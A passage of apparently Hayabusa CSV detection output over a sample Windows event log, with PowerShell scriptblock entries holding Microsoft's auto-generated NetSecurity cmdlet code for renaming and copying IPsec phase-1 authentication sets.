[Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ 
} { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 